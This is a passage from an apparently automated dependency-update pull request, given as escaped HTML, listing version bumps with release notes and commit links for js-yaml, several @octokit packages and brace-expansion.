href=\"https://redirect.github.com/nodeca/js-yaml/issues/570\"\u003e#570\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/9963d366dfbde0c69722452bcd40b41e7e4160a0\"\u003e\u003ccode\u003e9963d36\u003c/code\u003e\u003c/a\u003e 3.14.2 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/10d3c8e70a6888543f5cdb656bb39f73e0ea77c1\"\u003e\u003ccode\u003e10d3c8e\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266\"\u003e\u003ccode\u003e5278870\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;) (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/731\"\u003e#731\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/3.14.1...3.14.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/plugin-paginate-rest` from 2.21.3 to 14.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e\u003ccode\u003e@​octokit/plugin-paginate-rest\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev14.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.1...v14.0.0\"\u003e14.0.0\u003c/a\u003e (2025-10-31)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd immutable releases, enterprise team membership, enterprise team organization endpoints (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e413e899\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /projects/{project_id}/columns\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /enterprises/{enterprise}/secret-scanning/alerts\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.0...v13.2.1\"\u003e13.2.1\u003c/a\u003e (2025-10-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003eba56fbc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.1...v13.2.0\"\u003e13.2.0\u003c/a\u003e (2025-09-29)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003enew Projects v2 endpoints, new code scanning dismissal endpoints, many other endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/690\"\u003e#690\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e0e236cb\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.0...v13.1.1\"\u003e13.1.1\u003c/a\u003e (2025-06-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ehandle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e8e5da25\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.1...v13.1.0\"\u003e13.1.0\u003c/a\u003e (2025-06-16)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and \u003ccode\u003ecompareCommitsWithBasehead\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/678\"\u003e#678\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e6d8ea8a\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.0...v13.0.1\"\u003e13.0.1\u003c/a\u003e (2025-05-25)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e\u003ccode\u003e413e899\u003c/code\u003e\u003c/a\u003e feat: add immutable releases, enterprise team membership, enterprise team org...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/3d311d679e3d3ebaf073a66c5ce8a0603bf47d52\"\u003e\u003ccode\u003e3d311d6\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/701\"\u003e#701\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003e\u003ccode\u003eba56fbc\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/80745be518d862ab9a304ffb7793be4ebc3de0ce\"\u003e\u003ccode\u003e80745be\u003c/code\u003e\u003c/a\u003e ci(action): update actions/checkout action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/687\"\u003e#687\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e\u003ccode\u003e0e236cb\u003c/code\u003e\u003c/a\u003e feat: new Projects v2 endpoints, new code scanning dismissal endpoints, many ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/bf19e3ed5f5e833712d2663984c4ce456696e93e\"\u003e\u003ccode\u003ebf19e3e\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.6.2 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/685\"\u003e#685\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/4f9fc562b1dda9d8f724e8ffee444141c2f45673\"\u003e\u003ccode\u003e4f9fc56\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/688\"\u003e#688\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e\u003ccode\u003e8e5da25\u003c/code\u003e\u003c/a\u003e fix: handle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e\u003ccode\u003e6d8ea8a\u003c/code\u003e\u003c/a\u003e feat: add paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and `compareCommitsWith...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8ec2713699ee473ee630be5c8a66b9665bcd4173\"\u003e\u003ccode\u003e8ec2713\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e - no new paginated endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/680\"\u003e#680\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v2.21.3...v14.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request` from 5.6.3 to 10.0.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request.js/releases\"\u003e\u003ccode\u003e@​octokit/request\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev10.0.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.7...v10.0.8\"\u003e10.0.8\u003c/a\u003e (2026-02-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003euse \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to properly support int64's (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/798\"\u003e#798\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003ef13f5d9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.7\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.6...v10.0.7\"\u003e10.0.7\u003c/a\u003e (2025-11-13)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ereadme:\u003c/strong\u003e properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003ef17c1c1\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/octokit/request.js/issues/785\"\u003e#785\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.6\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.5...v10.0.6\"\u003e10.0.6\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/783\"\u003e#783\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/1aeac5672c04bc508e46796660465b1b67cf397c\"\u003e1aeac56\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.5\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.4...v10.0.5\"\u003e10.0.5\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update octokit deps (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/772\"\u003e#772\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/30f83b64578eebf6988b44df495d235de8136e6e\"\u003e30f83b6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.3...v10.0.4\"\u003e10.0.4\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/775\"\u003e#775\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/ad78b4c8099a790d9ac3489342021896cabdbecd\"\u003ead78b4c\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.2...v10.0.3\"\u003e10.0.3\u003c/a\u003e (2025-06-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003epkg:\u003c/strong\u003e unreplaced version number in \u003ccode\u003edist-bundle/\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/765\"\u003e#765\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/5b181af867a6b3ccfd23800d876ff22e1e54fd7d\"\u003e5b181af\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.1...v10.0.2\"\u003e10.0.2\u003c/a\u003e (2025-05-20)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003e\u003ccode\u003ef13f5d9\u003c/code\u003e\u003c/a\u003e fix: use \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to prop...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/9ba6ae0fd2eff35a6c29a9f032eca6e9ba002976\"\u003e\u003ccode\u003e9ba6ae0\u003c/code\u003e\u003c/a\u003e Document that unsuccessful HTTP status code result in an exception (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/795\"\u003e#795\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/7160b8201ee183d57e3572c9ac78aa3f241c9468\"\u003e\u003ccode\u003e7160b82\u003c/code\u003e\u003c/a\u003e chore(deps): replace glob with tinyglobby (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/791\"\u003e#791\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ab8018b6d42de25adb305e3ea5ea840ee2805481\"\u003e\u003ccode\u003eab8018b\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/776\"\u003e#776\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/fb916e454df205980835281368da81a003cde30d\"\u003e\u003ccode\u003efb916e4\u003c/code\u003e\u003c/a\u003e build(deps): bump vite from 6.3.4 to 6.4.1 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/780\"\u003e#780\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/e1eb7693969a87cbdde278c82a7474b8acec9207\"\u003e\u003ccode\u003ee1eb769\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency esbuild to ^0.27.0 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/784\"\u003e#784\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003e\u003ccode\u003ef17c1c1\u003c/code\u003e\u003c/a\u003e fix(readme): properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ea46fa9cd46f970fad5e286e6fdd2ea46929ac5d\"\u003e\u003ccode\u003eea46fa9\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/778\"\u003e#778\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/8166d281814326b3e11d60b1895e623f2fd51c9e\"\u003e\u003ccode\u003e8166d28\u003c/code\u003e\u003c/a\u003e chore(deps): update vitest monorepo to v4 (major) (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/781\"\u003e#781\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/1aeac5672c04bc508e46796660465b1b67cf397c\"\u003e\u003ccode\u003e1aeac56\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/783\"\u003e#783\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request.js/compare/v5.6.3...v10.0.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for \u003ccode\u003e@​octokit/request\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request-error` from 2.1.0 to 7.1.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request-error.js/releases\"\u003e\u003ccode\u003e@​octokit/request-error\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.2...v7.1.0\"\u003e7.1.0\u003c/a\u003e (2025-11-13)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003einherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e property (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/535\"\u003e#535\u003c/a\u003e/\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/536\"\u003e#536\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e2ea2780\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.1...v7.0.2\"\u003e7.0.2\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003ee5a75ef\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.0...v7.0.1\"\u003e7.0.1\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/522\"\u003e#522\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/4a453f21afbde9fc19d779518cb8e5f23d05038f\"\u003e4a453f2\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.8...v7.0.0\"\u003e7.0.0\u003c/a\u003e (2025-05-20)\u003c/h1\u003e\n\u003ch3\u003eContinuous Integration\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003estop testing against NodeJS v18 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/512\"\u003e#512\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/8eee0c1eff4f247b714da5db9437787507e124df\"\u003e8eee0c1\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eDrop support for NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ebuild: set minimal node version in build script to v20\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eci: stop testing against NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.7...v6.1.8\"\u003e6.1.8\u003c/a\u003e (2025-04-10)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v14 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/505\"\u003e#505\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/ab4ea7b81bd8055060bfafa47b7eb13d89c7e475\"\u003eab4ea7b\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.7\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e\u003ccode\u003e2ea2780\u003c/code\u003e\u003c/a\u003e feat: inherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/ac7b3094475260d5bc95951d2040e38da8e88dd8\"\u003e\u003ccode\u003eac7b309\u003c/code\u003e\u003c/a\u003e chore(deps): update vitest monorepo to v4 (major) (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/531\"\u003e#531\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/dadc76ddc454c475f07525a8cd96fc29e4353cb1\"\u003e\u003ccode\u003edadc76d\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/525\"\u003e#525\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/f57f2e6b6fdc3578c3484c8939bcf56548b620eb\"\u003e\u003ccode\u003ef57f2e6\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/534\"\u003e#534\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003e\u003ccode\u003ee5a75ef\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5d5de21540843d46e1dbd15696af8bdff9cf400\"\u003e\u003ccode\u003ee5d5de2\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/532\"\u003e#532\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/8cc127bf725e581cdd32336669d322632e4392b4\"\u003e\u003ccode\u003e8cc127b\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v6 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/529\"\u003e#529\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/b3a876bc68c0d044bf52eeaa513760e362d426e8\"\u003e\u003ccode\u003eb3a876b\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/527\"\u003e#527\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/cf1817b2c1bd15ffbf26bbf4390aa07084a10fce\"\u003e\u003ccode\u003ecf1817b\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/528\"\u003e#528\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/61f1e8750fa8c1b7b57f4323ab13b92bb1017cf2\"\u003e\u003ccode\u003e61f1e87\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency tinybench to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/519\"\u003e#519\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request-error.js/compare/v2.1.0...v7.1.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `brace-expansion` from 1.1.11 to 1.1.12\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca 